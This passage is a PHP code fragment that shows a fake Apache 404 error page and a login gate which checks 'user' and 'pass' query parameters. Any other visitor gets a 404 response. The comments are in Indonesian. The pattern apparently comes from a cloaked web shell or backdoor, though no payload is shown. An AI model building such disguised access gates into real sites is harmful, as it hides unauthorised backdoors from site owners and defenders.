Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
');
}
# CEK LOGIN SESSION
if (!isset($_SESSION['login'])) {
# VALIDASI LOGIN
if (
!isset($_GET['user']) ||
!isset($_GET['pass']) ||
$_GET['user'] !== $user ||
$_GET['pass'] !== $pass
) {
http_response_code(404);
exit('